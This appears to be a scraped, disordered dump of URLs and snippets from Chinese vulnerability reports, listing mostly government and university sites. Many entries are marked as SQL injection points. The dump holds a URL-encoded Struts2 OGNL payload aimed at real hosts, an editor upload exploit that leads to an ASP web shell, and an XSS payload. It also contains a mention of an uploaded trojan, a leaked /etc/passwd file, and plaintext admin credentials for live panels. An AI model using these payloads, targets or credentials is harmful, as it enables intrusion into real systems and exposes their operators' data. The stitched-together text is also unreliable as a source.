http://***.gov.cn/virtualhall/instance/searchinfo.jsp?flownum= http://agent.leadsec.com.cn/agent/countryProvinceChange.htm?currTime=Tue%20Jul%2001%202014%2009:15:09%20GMT+0800 http://drops.wooyun.org/wp-content/themes/GZai/kindeditor/php/file_manager_json.php?path=/data1/www/htdocs/646/wydrops/2/&dir=image http://地址/cgi-bin/passwd.cgi http://58.61.144.23/cgi-bin/passwd.cgi en.sau.edu.cn/eventsDetail.asp?D_id=1541 http://lib.sau.edu.cn/VoteSave.aspx?SubjectID=2 http://lib.sau.edu.cn/VoteSave.aspx?SubjectID=2 http://sqlmap.org http://drops.wooyun.org/webview.html http://oa.tjfsu.edu.cn/login.asp http://vos.tjufe.edu.cn/login.asp http://www.shhjwl.com/vos/login.asp http://cqkyoa.oicp.net/login.asp http://oa.hjshy.com/login.asp http://www.cnshuiyu.com/login.asp http://www.fzsyxx.com/oa/ http://211.68.250.42/login.asp http://211.68.192.21/login.asp http://60.171.34.204:8086/ http://121.30.226.44/login.asp http://116.228.82.237/login.asp http://180.166.7.94/login.asp http://VICTIM.COM/loginverify.asp http://oa.tjfsu.edu.cn/loginverify.asp http://地址/status_dev_info_t.gch http://地址/manager_dev_config_t.gch http://地址/wlan_security.gch http://地址/manager_log_conf_t.gch http://se.360.cn/ http://chrome.360.cn/ Author:wdlinux QQ:12571192 Url:http://www.wdlinux.cn/wdcp http://219.118.247.53/view/view.shtml http://www.webworldcam.com/webcam-index.php?var=11966&site=http://12.154.142.171/view/view.shtml https://www-n.oca.eu/general/services/meteo/camera-c1.htm http://86.56.142.34/view/view.shtml http://gzjd.hubzs.com.cn/login!init.action http://wq.tom.com/include/inuc.php?zkes5/show/TmvR.rar http://eu.s.detprod.com/ouk2nfucljpw49un.js?"+N6ERcfj http://uhjhg9x9fhrf.syysw.cn/index.php?EdxZh/list/DjQ.html_1404490158000 http://www.cc.cdut.edu.cn/ baoku.baidu.com/search.php,word参数。 http://ge2bbs.9hgame.com/ http://websec.intersecnet.com/login.action搞进去(struts2) http://websec.intersecnet.com/guige.jsp马地址 http://websec.intersecnet.com/jyhack.txt黑页一个 http://96361.xyhdz.gov.cn/jigou.php?id=42 http://ahfp.ah.gov.cn/information.jsp?xmid=2034 http://blwl.bl.gov.cn/bljh_1.aspx?id=102 http://bz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://ctq.hd.gov.cn/source/list/qzzy_list.asp?id=4 http://ftpf.ft.gov.cn/News.asp?classid=78 http://fzb.ahsz.gov.cn/openxw.asp?id=41041 http://fzb.chancheng.gov.cn/news/view.asp?id=3630 http://fzg.tonghua.gov.cn/pinglun3_alldis.php?yitiid=21 http://gbjy.ggedu.gov.cn/list.aspx?cid=1 http://gk.jxwy.gov.cn/ecms/IndexServlet?siteID=2&nodeID=55010 http://gxs.qz.gov.cn/newslist.asp?id=14 http://gyrsj.gov.cn/tmp/wzpm.shtml?show=list&UI_ID=2 http://hbjgczl.tongchuan.gov.cn/list.aspx?id=1 http://hlxxgk.lbx.gov.cn/GPI/index.aspx?dept=92338301 http://hrss.jldl.gov.cn/?mod=index&act=article&doing=list&cid=2 http://jjw.huzhou.gov.cn/zt_xjhd/zt.asp?bigfeatureid=20 http://jsj.nanan.gov.cn/?ctl=index&act=list&category_code=67108864 http://jsj.pinghu.gov.cn/SpecialPage/index.aspx?url_pid=174&cateid=360 http://ldj.cqyc.gov.cn/Page/zw_jzxx_Content.aspx?id=2779 http://m.wtlz.gov.cn/list.asp?type=2&c=20107895055150 http://m.ypbxygw.gov.cn/list.asp?type=2&c=20107895055150 http://md.dali.gov.cn/article_show_mdgk.asp?articleid=24215 http://mzj.xinxiang.gov.cn/zxnr.asp?classid=1&id=5940 http://nsrxx.hazz-l-tax.gov.cn/nsrxx/list/spbf.do?b_spbf=true&spid=27 http://people.nbfet.gov.cn/hyzsxi.php?id=519 http://rc.szxcdj.gov.cn/infodisp.asp?id=615 http://sclz.lss.gov.cn/template/default/newslist.jsp?classId=8a22804434c19b5f0134d0bdb4b0002a http://st.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://szlb.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://szxx.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://tea.hsq.gov.cn/list_tp.asp?sort_id=578 http://tw.daqing.gov.cn/nzcms_list_news.asp?id=743&sort_id=657 http://tyj.zgwj.gov.cn/UpFile/template/firstpage/wjtyw_current/TywWebMessage.aspx?xftype=3 http://wh.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://www.167.gov.cn/167jtcontent.aspx?ArticleID=781 http://www.ahczzx.gov.cn/ShowNews.asp?id=5563 http://www.ahjjjc.gov.cn/article.php?MsgId=91430 http://www.ahshiliang.gov.cn/info.php?left=1&cat_pid=67 http://www.ahszkj.gov.cn/content/info.php?Pid=1&ty=2 http://www.ahzbtb.gov.cn/include/web_content.php?id=446 http://www.alsyqdj.gov.cn/jcdj_show.asp?newsid=64 http://www.aqzyjjjc.gov.cn/article.php?MsgId=91428 http://www.asga.gov.cn/newsDetail.aspx?id=17125 http://www.bhzb.gov.cn/q_flfw.asp?lm_id=1023 http://www.bjdag.gov.cn/newlist.php?id=24 http://www.bjhrjjjc.gov.cn/group2.php?GroupID=1723 http://www.bjszfj.gov.cn/newlist.php?id=5 http://www.bzsly.gov.cn/brow.asp?classid=4 http://www.chssf.gov.cn/about.php?id=1 http://www.chty.gov.cn/Mlty.php?classid=7 http://www.cxqi.gov.cn/E_ReadOpinion.asp?OpinionID=763 http://www.cygsj.gov.cn/sub2_BGXZ.aspx?id=4 http://www.djkfda.gov.cn/jgjj.asp?id=398 http://www.dstz.gov.cn/dstz/bbjsxs1.asp?id=24 http://www.edu-gzstats.gov.cn/show/showarticle.asp?ID=770 http://www.fengquan.gov.cn/lyny.php?id=21 http://www.fhagri.gov.cn/lzwh/imagesview.asp?P_ID=611 http://www.fjzzrd.gov.cn/web/cwhgk.asp?LMid=25 http://www.fssrd.gov.cn/xwy.asp?wb=1&bh=937 http://www.gdmz.gov.cn/bbs/rss.php?auth=0 http://www.grcz.gov.cn/zixun_detail.jsp?id=424 http://www.grjcy.gov.cn/more.aspx?sid=0107 http://www.gybxy.gov.cn/gyfwcla.asp?id=10 http://www.gzgb.gov.cn/Article/?Type=18 http://www.heishan.gov.cn/hsxwsp/index.asp?id=1717 http://www.hnzx.gov.cn/detailP.aspx?id=2254 http://www.hygz.gov.cn/news/bgshow.asp?id=83 http://www.jintai.gov.cn/about_view.aspx?id=1651 http://www.jjfc.gov.cn/class_2.asp?classid=40&newsid=498 http://www.jjjt.gov.cn/page/col1_lb.php?lbid=657 http://www.jjsf.gov.cn/Browse/InfoD.aspx?Board=1801 http://www.jrfgw.gov.cn/onews.asp?id=2468 http://www.jsycjw.gov.cn/oldjjw/3.asp?id=69 http://www.jzkfqsafety.gov.cn/kf/msg.asp?id=33 http://www.kscein.gov.cn/Information/Information_View.aspx?Contentid=8498 http://www.lasw.gov.cn/list/index.php?zlm=1 http://www.lcczj.gov.cn/Article_Class.asp?ClassID=44 http://www.lishan.gov.cn/aspx/online.aspx?onlineID=4 http://www.llny.gov.cn/index_list.aspx?id=60 http://www.lqmz.gov.cn/type.asp?ID=1 http://www.lwgajj.gov.cn/news_view.asp?newsid=216 http://www.lyjd.gov.cn/view.asp?id=1535&cid=244 http://www.mldw.gov.cn/chief/index.php?ty=182 http://www.ncfdj.gov.cn/CongYeZhuTiXianShi.aspx?ID=20 http://www.nmciq.gov.cn/hdpd/myzj/myzjadd.jsp?id=672 http://www.nmgmr.gov.cn/search.jsp?title_content=all&keyword= http://www.nmgsports.gov.cn/search.jsp?title_content=all&keyword= http://www.nmqs.gov.cn/search.jsp?keyword= http://www.phbi.gov.cn/readnews.asp?id=4213 http://www.pjw.gov.cn/pwsjxx/xj_xx.asp?id=900 http://www.pjzxw.gov.cn/Zxdt.Asp?cid=2 http://www.qxn.gov.cn/Search.html?Q=%E9%99%88%E9%B8%A3%E6%98%8E http://www.qy.gov.cn/Vote.aspx?Id=8 http://www.qzrf.gov.cn/cjwtlist.aspx?t=1 http://www.sasacgs.gov.cn/leader.jsp?classid=23 http://www.scncjt.gov.cn/mail.aspx?type=2 http://www.shaoshanxiang.gov.cn/class.asp?id=296&classId=295 http://www.shcredit.gov.cn/e_lmwz_list.jsp?colid1=2&colid2=37 http://www.shuikou.gov.cn/news.php?id=950 http://www.slpop.gov.cn/content.do?method=sendTo&cid=106 http://www.snciq.gov.cn/ysqgkzzjg.jsp?urltype=tree.TreeTempUrl&wbtreeid=18341 http://www.sxsd.gov.cn/about_list.aspx?id=5&oid=1 http://www.sxth.gov.cn/sxyx/changhang.aspx?id=19339 http://bs.jl.gov.cn/BsWebCms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/jsp/connector http://www.gzzb.gov.cn/ http://www.gzzb.gov.cn/NewsList.aspx?InfoType=工作动态 http://www.gzzb.gov.cn/NewsList.aspx?InfoType=工作动态 http://sqlmap.org http://bbs.58game.com/uc_server/ http://ahshiliang.gov.cn/info_ztbd.php?left=3&cat_pid=4&cat_pidzt=78 http://jyzx.scau.edu.cn:81/) http://jyzx.scau.edu.cn:81/cnews/2014/07/03/160146NxVw.html http://202.116.174.108:8080/reader/login.php) www.ggj.hbjt.gov.cn http://www.ggj.hbjt.gov.cn/ggj/news/listSpecial.jsp?artColumn=030310 http://www.ggj.hbjt.gov.cn/ggj/news/listSpecial.jsp?ar http://sqlmap.org http://www.cdedu.gov.cn/service/index.aspx?isc_id=29 http://www.zxg365.com/personal/yl.php?yhid= http://gd.189.cn/biz/bill/queryProdList.action http://www.lc96228.com/NewsShow.aspx?ctype=4&id=20&pid=7 http://wooyun.org/bugs/wooyun-2010-061213 http://oa.h***y.com/InforForWeb/OA_Image1.asp?value=1588&type=b http://oa.h***y.com/InforForWeb/index.asp?classid=1&SubClassID=4 http://www.yuexiu.gov.cn/recruit1/resumePreview.jsp?resumeId=1101&catid=9963 http://www.yxst.gov.cn/recruit/resumePreview.jsp?resumeId=174&catid=9989 http://222.240.215.227:23380/ http://www.jletv.cn/program_show_list.aspx?nid=11811 http://www.jletv.cn/admin http://www.jletv.cn/CuteSoft_Client/CuteEditor/uploader.ashx?_Addon=xhttp&_AddonGuid=e7d8104a-0ba6-4b47-8285-59d442e2b7d3&_PartialStart=0&_PartialFileName=1.asp http://www.jletv.cn/uploadertemp/uploading.e7d8104a-0ba6-4b47-8285-59d442e2b7d3.1.asp;.resx?a=response.write%28%22hehe%22%29 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1365171718702【注入点】 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1 http://www.2144.cn/girls/detail/offset/1【注入点】/cate_id/1【注入点】 http://my.tv.sohu.com/user/setting/mobile.do http://my.tv.sohu.com/user/a/mobile/bindMobile.do?m=18311110000&code=6567 http://www.2144.cn/girls/ajaxGetFalls/?byMonth=0&cid=1&page=1&pageSize=12&t=0.7178548609372228 http://vip.sto.cn/RegisterAction.action http://vip.sto.cn/RegisterAction.action?redirect:Http://www.baidu.com http://vip.sto.cn/RegisterAction.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D https://udb.duowan.com http://www.jumei.com/track_cps.php?referer=yiqifa_cps&src=yiqifa_cps&sub_src=Njc3MzgyfDAwOTQ2MjFkNGQxMTQ1ODFmMjJi&ret=http://www.jumei.com/ inurl:Flight/InternationalTicket.asp http://www.tokair.com/ http://idc.dzwww.com/ShowNews.asp?id=5 http://e.visitbeijing.com.cn/category.php?act=scenic_ticket&tid=0&aid=512&pr=0&sort=time&order=desc http://fes.adidas.com.cn/ http://fun.kid.qq.com/ebookController/update_assets_list?&=a&campaignID=1&etclass=0&formatID=6&t=Fri%20Jun%2027%2012:27:18%20GMT+0800%202014&tags=&templateID=561 http://www.qule.com/news/index.html?type=10&News_page=2 http://www.qule.com/cscenter/commonquestion.html?type=3&gameid=1028&Userquestion_page=2 http://www.qule.com/adindex.php?ida=SX_130_48_33&idu=1 http://www.bcbay.com/life/education/newsViewer.php?id=243820出现多种显然易见的SQL注射漏洞,危害不小 http://mpa.zjgsu.edu.cn/web.rar http://bbs.hdbird.com/ http://www.jje.cn/九江教育xx网, http://www1.binyang.gov.cn/govinfo/infolist.aspx?TiCaiHao=T12&LeiMuDaiMa=T1201 http://xxx.com/?plugin=yls_reg www.huyue.com.cn http://218.25.115.6/travelcharter/edit.do Username:lgk Password:hy1234567 Username:bwp02 Password:hytravel612 http://www.techbridge-inc.com/action.php http://www.techbridge-inc.com/ www.techbridge-inc.com http://my.kekenet.com/index.php/user/resetpsw/xxxxxxxxxxxxxxxxx.html http://www.magicwinmail.com/success.php plus.aili.com/product.php?keyword=&nums=10&channel=pro_shehua&jsonpcallback=jsonp1404612914837 plus.aili.com/product.php?keyword=&nums=10'&channel=pro_shehua&jsonpcallback=jsonp1404612914837 plus.aili.com/product.php?keyword=&nums=10 plus.aili.com/product.php?keyword=&nums=10 http://swgk.impcas.ac.cn/fckeditor/editor/filemanager/connectors/test.html http://m.ly.com/deal/membersign.html?mid=19869225a323e36b88f8d89a7cb6114f&stype=0&pwd=a94057c50ef3c68fd22d9c53a311af91&ts=1404614412&sign=20f739012243fd8082c28246880d0adf http://m.ly.com http://%24%7Balimama.alimamaroot%7D/orange/alipay_bind_callback_mm.htm http://www.rohde-schwarz.com.cn/ http://cii.songguo.com/Login.aspx http://www.fao.org/nems/rss/nems_detail.asp?event_id=39480 http://drops.wooyun.org/papers/548 http://cofcomag.cofco.com/cn/periodical/old.aspx http://zlh.cofco.com/SiteFiles/Inner/action.aspx?publishmentSystemID=71&styleID=9&type=login http://www.ruaho.com http://www.uninx.com/lgy_nzdj/index2.php?ID=2153&member_id=19405 http://nx.bbn.com.cn/lgy_nzdj/index2.php?ID=2153&member_id=19405 http://search.veryeast.cn/job_search/job_list http://house.focus.cn/chinacrrc/res_yjbg.php http://ele.me/ http://m2.qiushibaike.com/article/77760799 http://nearby.qiushibaike.com/user/6395516/detail http://www.hbsjtt.gov.cn/ http://222.222.62.73:8080/XFMana/wsxf.do http://www12.zzu.edu.cn/ie/details.php?newsType=2&newsId=624 http://hb4006.cn/ http://hb4006.cn/service.php?News_ParentID=6&News_ID=6 http://www.jdair.net http://drops.wooyun.org/webview.html后出现searchBoxJavaBridge_接口漏洞。如上图。 http://10.218.42.26:7001/MWWebSite/console/Default.jsp?rootMenuID=b62830d9-26d8-4614-a5e9-f202bdb91a2a http://wooyun.org/bugs/wooyun-2010-065284 http://wooyun.org/bugs/wooyun-2010-065340可被以下函数绕过: table-layout:fixed;word-break:break-all margin-left:0;margin-right:0 http://wo.online.cn/ http://wo.online.cn/reg/findpwd.aspx teacherlms.gzedu.com/login.do http://teacherlms.gzedu.com/login.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://zkzs.nau.edu.cn/1/sm.asp?id=1 http://zkzs.nau.edu.cn/1/admin/u_u.asp?id=1893 http://www.lhbm.gov.cn/ShowDetail.asp?id=430&SType=6 http://hz.focus.cn/housemarket/video/video_show.php?id=43 http://nj.focus.cn/housemarket/video/video_show.php?id=27 http://house.focus.cn/endhouse/wf_show.php?house_id=37 http://uadm.dooland.com/loading/news.php?group_id=20&id=805 inurl:Qnews.php?ID= http://home.focus.cn/newscenter/newscenter.php?subject_id=33&show_citynum=549755813888 http://home.focus.cn/jiancaicheng/index.php?city_id=39 http://home.focus.cn/elite/article_index.php?group_id=2513&class_id=857 http://home.focus.cn/group/class_photos_more.php?type=pic&class_id=18 http://home.focus.cn/msglist/1703/?chkusr_id=11179/ http://home.focus.cn/group/photo.php?group_id=1702 http://home.focus.cn/group/photoshow.php?photo_id=4160673&group_id=1702 http://home.focus.cn/life/news_week.php?days=7&category_id=2 http://home.focus.cn/life/newscenter.php?subject_id=9 inurl:cms/voteManager/ inurl:seeresult_bz.jsp http://www.yilicai.com.cn/editor/ http://m.2144.cn/a/default/tag?name=%E8%B5%9B%E8%BD%A6&type=click【注入点】 http://m.2144.cn/a/default/tag?name=%E8%B5%9B%E8%BD%A6&type=click http://m.2144.cn/a/default/tag?name=%E8%B5%9B%E8%BD%A6&type=click http://ims.agent.soufun.com/soufuntalk/OnlineTalk/Client.ashx?callback=jsonp1404532114077&RequestType=GetAgentInfo&City=%25E9%2598%25B2%25E5%259F%258E%25E6%25B8%25AF&AgentIds=163437693 sql:http://www.qckd.net/news.asp?id=82 http://www.qckd.net/down/ http://www.qckd.net/downfile.asp http://www.qckd.net/info/index.htm http://www.dooland.com/magazine/dl2.php?pid=106665 http://***.***.com//users/1.app http://202.102.41.221 http://www.hisense.com) www.gzidc.com user:yabiao@21cn.com password:123456 http://www.ns365.net/siteadminlogin.php?domain=zhiboguangzhou.com user:domainmaster website:zhiboguangzhou.com password:dx2uCfyW http://124.172.221.86:81/)~然后登录以后就是可以查看达能所有的订单的照片~上面有什么你懂的~危害你懂的~订单数量太大,不好计数,就不说具体多少了~看下面吧 http://ptcms.csdn.net/article/service/article_count?preview=1&aid=2820528&jsonpcallback=jQuery1910415277008194493_1404614931360&_=1404614931367 http://wooyun.org/bugs/wooyun-2010-053726 http://home.focus.cn/elite/newscenter.php?class_id=22 http://www.qckd.net/news.asp?id=82 http://appservice.lenovomm.com/lenovo-bless/login/submit http://changchun.ccpit.org/show.php?classid=1&id=889 DDD31A47F94F366F138A0E06C2D4449EB8879EC4:localhost A849F277BCEF900CEF905B8DE721CF915E8EC466:localhost DF044FCDFF0A48E1C2B0CC7CC2ADEE5649B4FF00:localhost C1CE94E50B84F18B7BE6F3ED9835EB0F7201D188:localhost ADA0D486C9EF130A5D7A40FC70776E10FCEB4157:localhost B88C904D810FC8E8A517A92AA580785C47BF206F:localhost DB6200F0946CE4FED0CA4907BF424434B744233F:localhost A81EF3E67F24FBC749046D53BB3F5DCC3DBD5923:localhost D78A92851F180B74B523D6EBE129C69FA8867179:localhost FDC3BD86E1E573CDDA6373775DB76A5355E7E5E0:localhost E19A24C051E6F7EDD37C227AD4D53B197AF0C032:localhost AD5EF9E6B67568AFD9ECB609CD2B6FE4C55D8AC4:localhost EF3AE579A7159F3510DDF84921400A9F379ACC82:localhost C0F03157E9D73033FC5A8E6A34F26649ED23E105:localhost DABD2B9DB8CB951D668C7ED01CB5B11631E02F15:localhost B889FD322B44CFABD99D7276CCC621AED97365AA:localhost E196D0A25AC09F2B7FE2641DFB750C71A79363C6:localhost EC4F36FC0FD77764431E2012E0AA5E72CA0B514A:localhost FA7B10DA3B8808FBE9D647A8DD66AB40B3BF5F54:localhost D3F093F51EB8D30F4D7AD8A57B94BAD98E7257B0:localhost A1564D00AEA081E46DE2C673304599CE65300CD0:localhost EAB66400B35B592B4C87064D3F6F2262D5539558:localhost B1DA0A2079FB2B2D292AB1A0B3E59FA15770F1DE:localhost BC4C8E05AC8F8EA01E0D15D9E8178B04B5BB1672:localhost AC988923403A7FB7AF05D8DCF5468F06DFD0FF1F:localhost EB59E9132FFC6DD9A83297484E3B80025CC95450:localhost A724078AE7107F2225D97E54B35FACE9B675D4CC:localhost A78B4DBE6CD1BB809CDB74E517059314AFDAA02E:localhost EC8137604C75C65B819F7FC0283F1013550B9C9B:localhost EC8137604C75C65B819F7FC0283F1013550B9C9B:localhost C68983BC1BA0FF4D6943B2705BD119F0610A3940:localhost F356804976F0AE4615D1856A71CD6837D02E85FD:localhost D49B4CC37597E53A3BF58C456DCD130455B55EED:localhost DF937FD66E90A312F1474546453EC319C123DF62:localhost BBD517CC5AA8784DABC94C450700C6AC14F79DFA:localhost BB12DEE2BD7202F127359F4803B44BDABA05EC69:localhost FFA2B2C7247E4023DEE72EFE43B3D033516CAB23:localhost E1E052D3D255E41527C0741B19A03887AD8ACC7E:localhost C9A0A677E5E1DE643E7C2DF97186E9042F8AC4A6:localhost E17B6E71140F0F6737F1CC6E851D2915A2E81ED3:localhost A70A4F897A1F9EC6834C5CBFE6921346B3DBA7DE:localhost C65123D1711DDA8A042DAB711879F6EC2D6BBEB9:localhost C1466A2F9DBB9D115C0AC6EF9FAD8E20DE0DA892:localhost CCBAFE646FEEF40ABB90D5587BF2C9B0220295BA:localhost B44942B668476E5771F0E6EC92DBDB04ECC90241:localhost B0104539D7065B033D341D8B81E40321DE4319FD:localhost D08DC7271E3669C5EB01628508A2465B34E23BE9:localhost F302DCDD13898E520BAA078D7F32BD5EC5E015EB:localhost B3B53B12694BAEEC2AA2C9FC6698A7715131B793:localhost D3FD71A6BED9A8FBF39892A734E8412131748869:localhost D31CBF464F9B4260C0CB21E23A277601EEC75133:localhost EDC489DDA5ED6A315B5C83356E56031560BEAD89:localhost F0482AC2C67409703FAF4C4F0AA69B0D16426B9D:localhost B9C81D2557102737E894A3D6177DF0B5DB4A47F9:localhost A99E88BF5081FEFF4A6F88147A57AD874A897F60:localhost B2DE25F723F751FD23686AB16B05E0C1E9CCA2FD:localhost DA70A09A9936BD0C29920DC8D3152FA1B730D4FE:localhost C0B495C545F63B8704231F5B9458CD906825F4BE:localhost E77234D5F33348F01EC64C3DE1E50B6E7BB39904:localhost E9035AE55DCC04BD5E325946FA7F5938C3F5E37C:localhost D8E75AC35F11C11A5EECB21ACC3BC60A80D6E716:localhost EF859BC72208C47F93B965F98DA6805E6BD7A3AF:localhost D2981A9F2CBF6E9ED57B6037DFF0A629DA514867:localhost BF143BE746EDDF4144D94DC3B11DC42D98A15278:localhost AE1E22A8678482EE3A156E406F0343C1FBFD2316:localhost F58E152737D2030FFC5AC7EF5E858B3771D95C44:localhost FFE8702A4A3E22FAAEFC80A1AF6D77F1CD38A313:localhost ADC9FECFF2F950B5F7543FA2475450E2D4FB4642:localhost A3D7B72BD5B7639DD448859C10FAF59CD0EAE3D8:localhost D0CB7C97A925824188EB23455A7F4B0EB0E705C9:localhost F71997CFB959E71D841A11F15AFCBDBA1CB0D54C:localhost E9035AE55DCC04BD5E325946FA7F5938C3F5E37C:localhost root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin mysql:x:27:27::/dev/null:/sbin/nologin www:x:1000:1000::/dev/null:/sbin/nologin shaowei:x:1001:1001::/home/shaowei:/bin/bash wdcpu:x:999:999::/www/wdlinux/wdcp:/sbin/nologin http://www.gamepaopao.com/mayi.website/game!login.action http://service.zj.10086.cn/yw/showinfo/show.do?bid=BFA93573C3D650FEE044B499BA622A0A http://res.ec.cn:8080/admin/login.php,用户名:zhejiang,密码:10086,对客户业务开通情况及客户经理情况进行查询。(登陆页面后,点击左列菜单“订购业务情况查询”进入后,在输入查询手机号后,点击查询。查询结果列表中包括客户开通服务、所属企业以及本企业的移动客服经理信息等情况)。 http://124.172.221.85:8081/query2014.asp http://work.bestv.com.cn/bestvhomesite/fckeditor/editor/filemanager/connectors/test.html可上传 http://work.bestv.com.cn/bestvhomesite/fckeditor/editor/filemanager/connectors/uploadtest.html可上传 http://work.bestv.com.cn//BestvHomeSite/upload/userfiles/media/ArticleUpdas.aspx上传的木马 inurl:sydwzk/demand inurl:sydwzk/download/Down.jsp www.zzsyzp.com(漳州市事业单位招聘考试网)示例: http://www.zzsyzp.com/syrcservlet?RequestType=SHOWINFO&memberID=11496&RightCode=Guest&InfoFlag=state http://61.235.249.195:6699/FilesUp/5e1e6923-4205-452d-bc25-6ed0855cb22a.gif http://61.235.249.195:808 http://61.235.249.195:6789 http://61.235.249.195:6789/ManageFrame/left.aspx http://61.235.249.195:6789/ManageFrame/top.aspx http://61.235.249.195:6789/Common/UserManage/UserEditOneself.aspx http://61.235.249.195:6789/Common/UserManage/UserEdit.aspx http://61.235.249.195:808/Common/UserManage/UserEdit.aspx http://61.235.249.195:808/Common/UserManage/UserList.aspx http://61.235.249.195:6789/Common/UserManage/UserList.aspx http://61.235.249.195:6789/Common/Common_Role/RoleList.aspx http://61.235.249.195:6789/Common/UserManage/UserList.aspx http://www.sanwant.com.cn/ http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1 http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1 http://cj.wyn88.com/ file:///mnt/sdcard/test.html;component=com.mx.browser/com.mx.browser.navigation.MxFullscreenWebviewActivity;end http://121.28.81.126/AIMSWeb/detail.jsp?option=showDetail&view=nyjj&id=201 http://www.flyji.com/user/index!logout.action http://www.flyji.com/user/index!logout.action url:http://fl.act.qq.com/119860/addev/h5/236719 http://www.hbwmc.cn/wmc/ http://xxgk.hfut.edu.cn/third.php?p_id=6&a_id=713 http://www.yiyouquan.com/ http://startbbs.com/topic/2332帖子下载的源码,肯定是最新的v1.1.5.2版本。 http://sq.jr.jd.com/topic/getHotTopicList?key=1000&callback=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://yto.21tb.com http://www.ky-express.com/Chanpin/Default.aspx?article=GPSdingwei http://222.247.53.199/ http://www.sunp.gov.cn/gpcsoft/Gpcsoft_login.do http://114.80.120.39:8080/ http://114.80.120.39:8080/logs/userIp/ http://114.80.120.39:8080/logs/userIp/20140304.txt http://114.80.120.39:8080/logs/userIp/userinfo.txt http://czsb.nbfet.gov.cn/progress.php http://地址/rom-0 http://119.93.175.74/rom-0 http://uc.mojichina.com/findpwd/byphone kf.buaa.edu.cn/doLogin.do http://join.iflytek.com/xfzp/utils/dynamic_search.aspx?word=%E5%BC%80%E5%8F%91&channelID=1&RecruitmentType=&Location=&Department=&PublishedTime=2014-02-07 inurl:inurl:cgi-bin/QTS.cgi?count= http://www.xjjw.gov.cn/News.asp?Bigid=30 http://www.lishan.gov.cn/aspx/online.aspx?onlineID=4 http://www.shuikou.gov.cn/news.php?id=950 http://www.bzsly.gov.cn/brow.asp?classid=4 http://zx.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1342 http://www.hygz.gov.cn/news/bgshow.asp?id=83 http://ftpf.ft.gov.cn/News.asp?classid=78 http://www.lwgajj.gov.cn/news_view.asp?newsid=216 http://www.gzgb.gov.cn/Article/?Type=18 http://www.jintai.gov.cn/about_view.aspx?id=1651 http://www.cygsj.gov.cn/sub2_BGXZ.aspx?id=4 http://www.bjhrjjjc.gov.cn/group2.php?GroupID=1723 http://www.tzhymz.gov.cn/getlist.asp?pmid=101&fmid=102 http://www.szzjrmfy.gov.cn/news.php?typeid=159 http://www.heishan.gov.cn/hsxwsp/index.asp?id=1717 http://www.gybxy.gov.cn/gyfwcla.asp?id=10 http://www.yclynk.gov.cn/newsview.asp?id=158 http://www.lyjd.gov.cn/view.asp?id=1535&cid=244 http://www.shaoshanxiang.gov.cn/class.asp?id=296&classId=295 http://jsj.pinghu.gov.cn/SpecialPage/index.aspx?url_pid=174&cateid=360 http://www.cxqi.gov.cn/E_ReadOpinion.asp?OpinionID=763 http://fzg.tonghua.gov.cn/pinglun3_alldis.php?yitiid=21 http://www.nmgsports.gov.cn/search.jsp?title_content=all&keyword= http://www.ahshiliang.gov.cn/info.php?left=1&cat_pid=67 http://www.grjcy.gov.cn/more.aspx?sid=0107 http://www.jzkfqsafety.gov.cn/kf/msg.asp?id=33 http://www.bhzb.gov.cn/q_flfw.asp?lm_id=1023 